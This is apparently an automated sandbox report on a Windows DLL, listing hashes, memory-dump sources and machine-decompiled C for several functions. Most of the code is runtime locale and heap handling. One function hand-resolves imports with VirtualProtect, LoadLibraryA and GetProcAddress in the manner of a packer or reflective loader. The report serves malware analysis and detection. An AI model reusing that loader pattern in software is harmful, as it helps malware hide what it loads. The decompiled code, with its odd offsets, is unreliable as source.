Instruction ID: 630b28f6aca4c5eae4c5899f11aa2e87e1d14ef52b987d25d28c45dc290d6ccd
Opcode Fuzzy Hash: 742e398ef474c4288a5d5449e1c5913801b3e3beac6dc4b3ac387022e504948f
Instruction Fuzzy Hash: F1E0B6B6D1010CAB8B08EFD4D9918EEB7BDAB48244F1045A9D906A7250EB306E54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3ACC7, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6EE3ACDA

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: b8491873f685e2eebcaa77a187cc3c060f0ab51aab52a7b8d1808a0a4185cf5c
Instruction ID: 69f55c038f5935bde86185dc389db0d45f4543cf7a50d7579b768230b30f0d3a
Opcode Fuzzy Hash: b8491873f685e2eebcaa77a187cc3c060f0ab51aab52a7b8d1808a0a4185cf5c
Instruction Fuzzy Hash: 46C04C71500208FBDB059FC5D94AA8E7FA9DB81268F244059E41557250DBB1EF459690

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCC400, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 6EDCC40D

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: 2bb5da8eb9042f291cca8bfa43adc8a5ecdb0c584f3f36ed0e02f8904114d9e4
Instruction ID: f1a97578bdef47d31295550fbe1d0d36d98855fa5d266af33fbd35787f3eb17a
Opcode Fuzzy Hash: 2bb5da8eb9042f291cca8bfa43adc8a5ecdb0c584f3f36ed0e02f8904114d9e4
Instruction Fuzzy Hash: 63C09B7091910CA75708DFC9E91156DB76CDA45258B1405DDE90E53301D9316E1055E9

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCC3E0, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

Concurrency::details::VirtualProcessorRoot::Subscribe.LIBCONCRTD ref: 6EDCC3EA

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Concurrency::details::ProcessorRoot::SubscribeVirtual
String ID:
API String ID: 3722791471-0
Opcode ID: c7ac7c9fdecbd0e746a0e778ef1f86efbfaced9f3d47a53356e5ae8c7ce2979b
Instruction ID: 56fa07dc647ddd962c2283bbaf05fe6b2dcd31e6c8ec8e2582cf7176dcdc18aa
Opcode Fuzzy Hash: c7ac7c9fdecbd0e746a0e778ef1f86efbfaced9f3d47a53356e5ae8c7ce2979b
Instruction Fuzzy Hash: FAB09B7091910CB74704DBC5E90145DF76CD685754B5001DDA90D573009A311E1095D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6EDCDA40, Relevance: 12.2, APIs: 8, Instructions: 169
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6EDCDA40(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int* _v24;
				signed int* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				long _v60;
				void* _v64;
				CHAR* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				long _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v112;
				char _v136;
				intOrPtr _t115;
				signed int* _t120;
				intOrPtr _t123;
				signed int _t183;
				signed int _t189;
				intOrPtr _t199;

				_push(0xffffffff);
				_push(E6EE56258);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t199;
				_v76 = __ecx;
				E6EDB18A0( &_v136, __eflags, 0x6ee5730c);
				_v8 = 0;
				E6EDB12B0(__eflags,  &_v112,  &_v136, 0x6ee57310);
				_v8 = 1;
				E6EDB30F0( &_v112);
				_push(E6EDB2660( &_v112));
				E6EDB1340(_t109);
				_v20 = _a4;
				_v32 = _a4 +  *((intOrPtr*)(_v20 + 0x3c));
				if( *((intOrPtr*)(_v32 + 0xbadc25)) != 0) {
					_v24 =  *((intOrPtr*)(_v32 + 0xbadc25)) + _v20;
					_t115 = _v32;
					__eflags =  *(_t115 + 0xd8);
					if( *(_t115 + 0xd8) == 0) {
						_v40 = 1;
					} else {
						_v40 = 0xc;
					}
					_v44 = _v40;
					_v56 =  *((intOrPtr*)(_v32 + 0x78 + _v44 * 8));
					_v60 =  *((intOrPtr*)(_v32 + 0x7c + _v44 * 8));
					_t183 = _v56 + _v20;
					__eflags = _t183;
					_v64 = _t183;
					VirtualProtect(_v64, _v60, 4,  &_v80);
					while(1) {
						_t120 = _v24;
						__eflags =  *(_t120 + 0xc);
						if( *(_t120 + 0xc) == 0) {
							break;
						}
						_t57 =  &(_v24[3]); // 0xcccccccc
						_v84 =  *_t57 + _v20;
						_t61 =  &(_v24[3]); // 0xcccccccc
						_v48 = LoadLibraryA( *_t61 + _v20);
						_t65 =  &(_v24[4]); // 0xcccccccc
						_v36 =  *_t65 + _v20;
						__eflags =  *_v24;
						if( *_v24 == 0) {
							_t73 =  &(_v24[4]); // 0xcccccccc
							_t189 =  *_t73 + _v20;
							__eflags = _t189;
							_v28 = _t189;
						} else {
							_v28 =  *_v24 + _v20;
						}
						while(1) {
							__eflags =  *_v28;
							if( *_v28 == 0) {
								break;
							}
							__eflags =  *_v28 & 0x80000000;
							if(( *_v28 & 0x80000000) == 0) {
								_t86 = _v20 + 2; // 0x2
								_v68 =  *_v28 + _t86;
								 *_v36 = GetProcAddress(_v48, _v68);
							} else {
								_v88 =  *_v28 & 0x0000ffff;
								 *_v36 = GetProcAddress(_v48,  *_v28 & 0x0000ffff);
							}
							_v36 = _v36 + 4;
							_v28 =  &(_v28[1]);
						}
						_v24 =  &(_v24[5]);
					}
					_v72 = 1;
					_v8 = 0;
					E6EDB1D80( &_v112);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v136);
					_t123 = _v72;
					L17:
					 *[fs:0x0] = _v16;
					return _t123;
				}
				_v52 = 1;
				_v8 = 0;
				E6EDB1D80( &_v112);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v136);
				_t123 = _v52;
				goto L17;
			}

0x6edcda43
0x6edcda45
0x6edcda50
0x6edcda51
0x6edcda5b
0x6edcda69
0x6edcda6e
0x6edcda85
0x6edcda8d
0x6edcda94
0x6edcdaa1
0x6edcdaa2
0x6edcdaad
0x6edcdab9
0x6edcdacc
0x6edcdb0d
0x6edcdb18
0x6edcdb1b
0x6edcdb20
0x6edcdb2b
0x6edcdb22
0x6edcdb22
0x6edcdb22
0x6edcdb35
0x6edcdb42
0x6edcdb4f
0x6edcdb55
0x6edcdb55
0x6edcdb58
0x6edcdb69
0x6edcdb6f
0x6edcdb6f
0x6edcdb72
0x6edcdb76
0x00000000
0x00000000
0x6edcdb7f
0x6edcdb85
0x6edcdb8b
0x6edcdb98
0x6edcdb9e
0x6edcdba4
0x6edcdbaa
0x6edcdbad
0x6edcdbbf
0x6edcdbc2
0x6edcdbc2
0x6edcdbc5
0x6edcdbaf
0x6edcdbb7
0x6edcdbb7
0x6edcdbc8
0x6edcdbcb
0x6edcdbce
0x00000000
0x00000000
0x6edcdbd5
0x6edcdbdb
0x6edcdc0f
0x6edcdc13
0x6edcdc27
0x6edcdbdd
0x6edcdbe8
0x6edcdc03
0x6edcdc03
0x6edcdc2f
0x6edcdc38
0x6edcdc38
0x6edcdc43
0x6edcdc43
0x6edcdc4b
0x6edcdc52
0x6edcdc59
0x6edcdc5e
0x6edcdc6b
0x6edcdc70
0x6edcdc73
0x6edcdc76
0x6edcdc80
0x6edcdc80
0x6edcdace
0x6edcdad5
0x6edcdadc
0x6edcdae1
0x6edcdaee
0x6edcdaf3
0x00000000

APIs

task.LIBCPMTD ref: 6EDCDADC
task.LIBCPMTD ref: 6EDCDAEE
VirtualProtect.KERNEL32(?,?,00000004,?,?,?,?,6EE5730C), ref: 6EDCDB69
LoadLibraryA.KERNEL32(000000FF,?,?,?,6EE5730C), ref: 6EDCDB92
GetProcAddress.KERNEL32(?,00000000), ref: 6EDCDBFA
GetProcAddress.KERNEL32(?,?), ref: 6EDCDC1E

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProctask$LibraryLoadProtectVirtual
String ID:
API String ID: 1190531450-0
Opcode ID: 72da010b6a79eed03593712e2835a57b32f81fbad7a5353952ef8e50b357f787
Instruction ID: 3c736ea426c22d686270cf3495b7f5f8c121e6242791f9c93000b9eae0a6d5c1
Opcode Fuzzy Hash: 72da010b6a79eed03593712e2835a57b32f81fbad7a5353952ef8e50b357f787
Instruction Fuzzy Hash: DF81CFB4D0020ADFCB08CF98C990BEEB7B6BF48314F208568E515AB390D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6EE51EAD, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EE51EAD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebp;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_t162 = __fp0;
				_push(__ecx);
				_push(__ecx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E6EE444CA(__ecx, __edx, __fp0);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E6EE51E40(0x6ee62400, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E6EE517B1(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E6EE518D1();
					} else {
						E6EE51838(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E6EE51E40(0x6ee620f0, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E6EE518D1();
							} else {
								E6EE51838(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E6EE51CFD(_t162, _t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x6
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
							_t47 = E6EE516FF(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6EE3AC93();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0x6ee77a68; // 0xbfafeb97
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E6EE444CA(_t98, _t115, _t162);
								_t88 = _t52;
								_t121 =  *(E6EE444CA(_t98, _t115, _t162) + 0x34c);
								_t128 = E6EE525E8(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E6EE4D365(_t121, _t128, _t162,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E6EE5271A(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E6EE361A7(_v12 ^ _t131);
							} else {
								if(E6EE44DE4(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E6EE44DE4(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E6EE55ECB(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E6EE44DE4(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E6EE55ECB(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E6EE484EA(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E6EE516FF(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x6ee51ead
0x6ee51eb2
0x6ee51eb3
0x6ee51eb5
0x6ee51eb8
0x6ee51eb9
0x6ee51eba
0x6ee51ec1
0x6ee51ec3
0x6ee51ec6
0x6ee51ec6
0x6ee51ec9
0x6ee51ec9
0x6ee51ecf
0x6ee51ed2
0x6ee51ed5
0x6ee51ed5
0x6ee51ed8
0x6ee51edb
0x6ee51edd
0x6ee51ee3
0x6ee51ee5
0x6ee51eea
0x6ee51ef4
0x6ee51ef9
0x6ee51efb
0x6ee51efe
0x6ee51efe
0x6ee51f00
0x6ee51f04
0x6ee51f4d
0x00000000
0x6ee51f06
0x6ee51f0b
0x6ee51f14
0x6ee51f0d
0x6ee51f0d
0x6ee51f0d
0x6ee51f1f
0x6ee51f29
0x6ee51f2e
0x6ee51f33
0x6ee51f39
0x6ee51f3d
0x6ee51f46
0x6ee51f3f
0x6ee51f3f
0x6ee51f3f
0x6ee51f52
0x6ee51f52
0x6ee51f33
0x6ee51f1f
0x6ee51f58
0x6ee52094
0x6ee52094
0x00000000
0x6ee51f5e
0x6ee51f5e
0x6ee51f67
0x6ee51f78
0x6ee51f6e
0x6ee51f6e
0x6ee51f6e
0x6ee51f7f
0x6ee51f83
0x00000000
0x6ee51fa7
0x6ee51fa7
0x6ee51fac
0x6ee51fae
0x6ee51fae
0x6ee51fb0
0x6ee51fb5
0x6ee5208f
0x6ee52091
0x6ee52096
0x6ee5209a
0x6ee51fbb
0x6ee51fbb
0x6ee51fbe
0x6ee51fbe
0x6ee51fc6
0x6ee51fc9
0x6ee51fc9
0x6ee51fcc
0x6ee51fcc
0x6ee51fcf
0x6ee51fd2
0x6ee51fdc
0x6ee51fe6
0x6ee51feb
0x6ee51ff0
0x6ee5209b
0x6ee5209d
0x6ee5209e
0x6ee5209f
0x6ee520a0
0x6ee520a1
0x6ee520a2
0x6ee520a7
0x6ee520ab
0x6ee520b3
0x6ee520ba
0x6ee520bd
0x6ee520be
0x6ee520c2
0x6ee520c3
0x6ee520c8
0x6ee520d0
0x6ee520df
0x6ee520eb
0x6ee520fc
0x6ee52104
0x6ee5211e
0x6ee5212b
0x6ee5212e
0x6ee52131
0x6ee52131
0x6ee52106
0x6ee52106
0x6ee52108
0x6ee5214c
0x6ee51ff6
0x6ee52006
0x00000000
0x6ee5200c
0x6ee5200e
0x6ee5200e
0x6ee5201a
0x6ee52028
0x00000000
0x6ee5202a
0x6ee5202a
0x6ee5202d
0x6ee52033
0x6ee52036
0x6ee52046
0x6ee5204b
0x6ee52059
0x00000000
0x00000000
0x00000000
0x00000000
0x6ee52038
0x6ee52038
0x6ee5203b
0x6ee52041
0x6ee52044
0x6ee5205b
0x6ee5205b
0x6ee52067
0x6ee52087
0x00000000
0x6ee52069
0x6ee52069
0x6ee52073
0x6ee52078
0x6ee5207d
0x00000000
0x6ee5207f
0x00000000
0x6ee5207f
0x6ee5207d
0x00000000
0x00000000
0x00000000
0x6ee52044
0x6ee52036
0x6ee52028
0x6ee52006
0x6ee51ff0
0x6ee51fb5
0x6ee51f83

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000007,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

GetACP.KERNEL32(?,?,?,?,?,?,6EE46D32,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6EE51F6E
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6EE46D32,?,?,?,00000055,?,-00000050,?,?), ref: 6EE51F99
_wcschr.LIBVCRUNTIME ref: 6EE5202D
_wcschr.LIBVCRUNTIME ref: 6EE5203B
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6EE520FC

Strings

utf8, xrefs: 6EE5206B

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: c94fed16703b2926c1555769c454b9ec02277a1b74b51270b77ac62374d62368
Instruction ID: 1b3019da88f86dfabc431b2df52a3b590d09e2ddd0fef8944f12d7e19cf77a87
Opcode Fuzzy Hash: c94fed16703b2926c1555769c454b9ec02277a1b74b51270b77ac62374d62368
Instruction Fuzzy Hash: B371F431610B02AAEB149FF5CC41BAB73BCEF59318F304869E6159B384EB72E565C760

Uniqueness

Uniqueness Score: -1.00%

Function 6EE52639, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EE52639(void* __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				int _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t10 =  &_v8; // 0x6ee52957
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004, _t10, 2) != 0) {
						_t13 =  &_v8; // 0x6ee52957
						_t17 =  *_t13;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6EE3F8C7(_t23, _t23);
									goto L25;
								}
								_t6 =  &_v8; // 0x6ee52957
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b, _t6, 2) == 0) {
									goto L22;
								}
								_t9 =  &_v8; // 0x6ee52957
								_t17 =  *_t9;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6ee5263e
0x6ee5263f
0x6ee52646
0x6ee526ea
0x6ee526ec
0x6ee52703
0x6ee52709
0x6ee52709
0x6ee5270e
0x6ee52710
0x6ee52710
0x6ee52716
0x6ee52719
0x6ee52719
0x6ee52705
0x6ee52705
0x00000000
0x6ee52705
0x6ee5264c
0x6ee52651
0x00000000
0x00000000
0x6ee52657
0x6ee5265c
0x6ee5265e
0x6ee5265e
0x6ee52664
0x00000000
0x00000000
0x6ee52669
0x6ee52680
0x6ee52680
0x6ee52689
0x6ee5268b
0x00000000
0x00000000
0x6ee5268d
0x6ee52692
0x6ee52694
0x6ee52694
0x6ee5269a
0x00000000
0x00000000
0x6ee5269f
0x6ee526bd
0x6ee526bf
0x6ee526e2
0x00000000
0x6ee526e7
0x6ee526c3
0x6ee526da
0x00000000
0x00000000
0x6ee526dc
0x6ee526dc
0x00000000
0x6ee526dc
0x6ee526a1
0x6ee526a9
0x00000000
0x00000000
0x6ee526ab
0x6ee526ae
0x6ee526b4
0x00000000
0x00000000
0x00000000
0x6ee526b6
0x6ee526b8
0x6ee526ba
0x00000000
0x6ee526ba
0x6ee5266b
0x6ee52673
0x00000000
0x00000000
0x6ee52675
0x6ee52678
0x6ee5267e
0x00000000
0x00000000
0x00000000
0x6ee5267e
0x6ee52684
0x6ee52686
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,W)n,00000002,00000000,?,?,?,6EE52957,?,00000000), ref: 6EE526D2
GetLocaleInfoW.KERNEL32(?,20001004,W)n,00000002,00000000,?,?,?,6EE52957,?,00000000), ref: 6EE526FB
GetACP.KERNEL32(?,?,6EE52957,?,00000000), ref: 6EE52710

Strings

ACP, xrefs: 6EE52657
OCP, xrefs: 6EE5268D
W)n, xrefs: 6EE526EC, 6EE52709, 6EE526C3, 6EE526DC, 6EE526C6, 6EE526EF

Memory Dump Source

Source File: 00000002.00000002.307164874.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000002.00000002.307150412.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307398913.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.307461252.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.307487147.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.307516159.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP$W)n
API String ID: 2299586839-2267789321
Opcode ID: 3f3402f8e05da9e59a4a716ee3082398802b521d5e893a124b5ab0adef61c886
Instruction ID: a41e4cee172f1ffc228c5751341930c866f802e3ba6175a6fe208a5fed2953cd
Opcode Fuzzy Hash: 3f3402f8e05da9e59a4a716ee3082398802b521d5e893a124b5ab0adef61c886
Instruction Fuzzy Hash: F421CF22624102AAE764CFD5D900A8773B6AF6CB68F328429E909DB304E773DD21C350

Uniqueness

Uniqueness Score: -1.00%

Function 6EE5280E, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE5280E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t127 = __fp0;
				_t39 =  *0x6ee77a68; // 0xbfafeb97
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E6EE444CA(__ecx, __edx, __fp0) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6EE444CA(__ecx, __edx, __fp0);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0x6ee62514; // 0x17
					E6EE527AD(_t91, 0, 0x6ee62400, _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E6EE5214F(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E6EE52235(_t91, _t99, __eflags, _t127,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E6EE52639(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
